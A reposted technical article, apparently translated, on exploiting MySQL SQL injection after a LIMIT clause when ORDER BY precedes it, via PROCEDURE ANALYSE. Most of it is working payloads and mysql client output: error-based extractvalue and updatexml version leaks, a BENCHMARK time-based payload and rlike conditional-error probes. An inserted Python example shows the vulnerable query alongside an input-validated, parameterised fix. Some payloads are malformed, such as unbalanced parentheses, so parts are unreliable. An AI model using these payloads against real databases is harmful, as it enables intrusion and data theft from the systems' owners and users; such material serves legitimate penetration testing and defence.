Exploitation methods after the LIMIT keyword in MySQL injection

Source: Internet
Author: User
Tags: benchmark, mysql, injection, rand, sleep, sql injection, xpath

Details

During a test I ran into an SQL injection problem for which I could not find a solution online. The injection point was after the LIMIT keyword, the database was MySQL 5.x, and the SQL statement looked like this:

SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT [injection point]

The crux of the problem is the ORDER BY clause. In MySQL a UNION can still follow LIMIT as long as no ORDER BY precedes the injection point, so without ORDER BY the union keyword could be used without trouble; here, however, there is an ORDER BY in front of the injection point. This situation has been discussed on Stack Overflow and sla.ckers, but without an effective solution.
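As an added example (not code from the article), here is the query shape above built two ways in Python: the vulnerable string concatenation, and a hardened version that accepts only the integer forms of LIMIT and binds them as parameters. The table, its rows and the sqlite3 in-memory database are constructed stand-ins for the MySQL table the article describes; the validation logic is the same for MySQL.

```python
import re
import sqlite3


def make_db():
    """Constructed stand-in for the article's table: sqlite3 in memory so the
    example runs offline (the MySQL statement has the same shape)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE t (id INTEGER PRIMARY KEY, field TEXT)")
    conn.executemany(
        "INSERT INTO t (id, field) VALUES (?, ?)",
        [(i, f"row{i}") for i in range(1, 6)],
    )
    return conn


def vulnerable_query(conn, limit_param):
    """The pattern from the article: user input pasted straight after LIMIT.
    Whatever follows the numbers is handed to the SQL parser unchanged."""
    sql = f"SELECT field FROM t WHERE id > 0 ORDER BY id LIMIT {limit_param}"
    return [row[0] for row in conn.execute(sql)]


def parse_limit(limit_param, max_rows=100):
    """Accept only 'count' or 'offset,count' made of digits and return
    (offset, count). Anything else (keywords, comments, functions) is rejected,
    and the row count is capped so a caller cannot dump the whole table."""
    m = re.fullmatch(r"\s*(?:(\d{1,9})\s*,\s*)?(\d{1,9})\s*", limit_param)
    if not m:
        raise ValueError("LIMIT must be 'count' or 'offset,count' with integers only")
    offset = int(m.group(1) or 0)
    count = min(int(m.group(2)), max_rows)
    return offset, count


def is_valid_limit(limit_param):
    """Convenience wrapper: True if parse_limit accepts the input."""
    try:
        parse_limit(limit_param)
        return True
    except ValueError:
        return False


def safe_query(conn, limit_param):
    """Hardened version: validated integers bound as parameters, never pasted
    into the statement text."""
    offset, count = parse_limit(limit_param)
    sql = "SELECT field FROM t WHERE id > 0 ORDER BY id LIMIT ? OFFSET ?"
    return [row[0] for row in conn.execute(sql, (count, offset))]


if __name__ == "__main__":
    db = make_db()
    print(safe_query(db, "1,2"))                    # ['row2', 'row3']
    print(is_valid_limit("1,1 procedure analyse(1,1)"))  # False
```

With MySQL drivers the integer coercion still matters: server-side prepared statements accept bound LIMIT arguments, while drivers that interpolate client-side will quote a string value, so passing the parsed integers rather than the raw request string is what keeps the injection point closed in both cases.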

Let's take a look at the SELECT syntax in MySQL 5.x:

SELECT
[ALL | DISTINCT | DISTINCTROW]
[HIGH_PRIORITY]
[STRAIGHT_JOIN]
[SQL_SMALL_RESULT] [SQL_BIG_RESULT] [SQL_BUFFER_RESULT]
[SQL_CACHE | SQL_NO_CACHE] [SQL_CALC_FOUND_ROWS]
select_expr [, select_expr ...]
[FROM table_references
[WHERE where_condition]
[GROUP BY {col_name | expr | position}
[ASC | DESC], ... [WITH ROLLUP]]
[HAVING where_condition]
[ORDER BY {col_name | expr | position}
[ASC | DESC], ...]
[LIMIT {[offset,] row_count | row_count OFFSET offset}]
[PROCEDURE procedure_name(argument_list)]
[INTO OUTFILE 'file_name' export_options
| INTO DUMPFILE 'file_name'
| INTO var_name [, var_name]]
[FOR UPDATE | LOCK IN SHARE MODE]]

LIMIT may be followed by the PROCEDURE and INTO keywords. INTO can be used to write files, but that is not the subject of this article; the focus here is PROCEDURE. By default MySQL provides only one procedure, ANALYSE (see the MySQL documentation).
Try this procedure:

mysql> SELECT field FROM table where id > 0 order by id LIMIT 1,1 procedure analyse(1);
ERROR 1386 (HY000): Can't use ORDER clause with this procedure
ANALYSE accepts two parameters, so try passing both:

mysql> SELECT field FROM table where id > 0 order by id LIMIT 1,1 procedure analyse(1,1);
ERROR 1386 (HY000): Can't use ORDER clause with this procedure
Still rejected. Next, try placing a subquery inside the ANALYSE parameter:

mysql> SELECT field from table where id > 0 order by id LIMIT 1,1 procedure analyze(select IF(MID(version(),1,1) LIKE 5, sleep(5), 1), 1);

The response is as follows:

ERROR 1108 (HY000): Incorrect parameters to procedure 'analyze'

So sleep was never executed. Finally I tried the following payload:

mysql> SELECT field FROM user WHERE id > 0 order by id LIMIT 1,1 procedure analyze(extractvalue(rand(), concat(0x3a, version())), 1);
ERROR 1105 (HY000): XPATH syntax error: ':5.5.41-0ubuntu0.14.04.1'

Aha, this is ordinary error-based injection. So if the injection point reports errors, everything works; if it does not report errors, time-based injection is still possible. The payload is as follows:

SELECT field FROM table WHERE id > 0 order by id LIMIT 1,1 PROCEDURE analyze(select extractvalue(rand(), concat(0x3a, (IF(MID(version(),1,1) LIKE 5, BENCHMARK(5000000, SHA1(1), 1), 1)

Interestingly, sleep is not used, but BENCHMARK is used.

mysql> SELECT host FROM mysql.user order by 1 LIMIT 0,3 /* SQL-inj */;
+-----------+
| host      |
+-----------+
| 127.0.0.1 |
| ::1       |
| Host      |
+-----------+
3 rows in set (0.00 sec)
Some additional observations in the MySQL client:

mysql> SELECT host FROM mysql.user LIMIT 0 procedure analyse(2)));
Empty set (0.00 sec)

mysql> SELECT host FROM mysql.user procedure analyse(2*2);
ERROR 1108 (HY000): Incorrect parameters to procedure 'analyze'

With ORDER BY present, the ORDER clause error is returned instead:
mysql> SELECT host FROM mysql.user order by 1 LIMIT 0,3 procedure analyse(4);
ERROR 1386 (HY000): Can't use ORDER clause with this procedure

A side observation on the rlike operator:
mysql> SELECT 18446744073709551610 * if((SELECT 1) rlike 1, 2, 2);
ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(18446744073709551610 * if((1 regexp 1),2,2))'

In the error message, rlike has been rewritten as regexp. Next, a subquery as the second parameter of analyse:

mysql> SELECT host FROM mysql.user LIMIT 0 procedure analyse(0, (SELECT 3));
Empty set (0.00 sec)

mysql> SELECT host FROM mysql.user LIMIT 0 procedure analyse(0, (SELECT '3'));
ERROR 1108 (HY000): Incorrect parameters to procedure 'analyze'

mysql> SELECT host FROM mysql.user LIMIT 0 procedure analyse(0, (SELECT 3 union SELECT 2 LIMIT 1));
ERROR 1108 (HY000): Incorrect parameters to procedure 'analyze'

mysql> SELECT host FROM mysql.user LIMIT 0 procedure analyse(0, (SELECT 3 order by sleep(1)));
Empty set (0.00 sec)

mysql> SELECT host FROM mysql.user order by 1 LIMIT 0 procedure analyse(0, (SELECT 3 order by /* SQL */));
ERROR 1386 (HY000): Can't use ORDER clause with this procedure

The error returned depends on the condition inside the subquery:

mysql> SELECT host FROM mysql.user order by 1 LIMIT 0 procedure analyse(0, (SELECT 3 order by 1 rlike if(mid(version(),1,1)=5, 0x00, 1)));
ERROR 1139 (42000): Got error 'empty (sub)expression' from regexp

mysql> SELECT host FROM mysql.user order by 1 LIMIT 0 procedure analyse(0, (SELECT 3 order by 1 rlike if(mid(version(),1,1)=6, 0x00, 1)));
ERROR 1386 (HY000): Can't use ORDER clause with this procedure

mysql> SELECT host FROM mysql.user order by 1 LIMIT 0 procedure analyse(0, (SELECT 3 order by updatexml(1, concat(0x3A, version(), 1))));
ERROR 1105 (HY000): XPATH syntax error: ': 100'
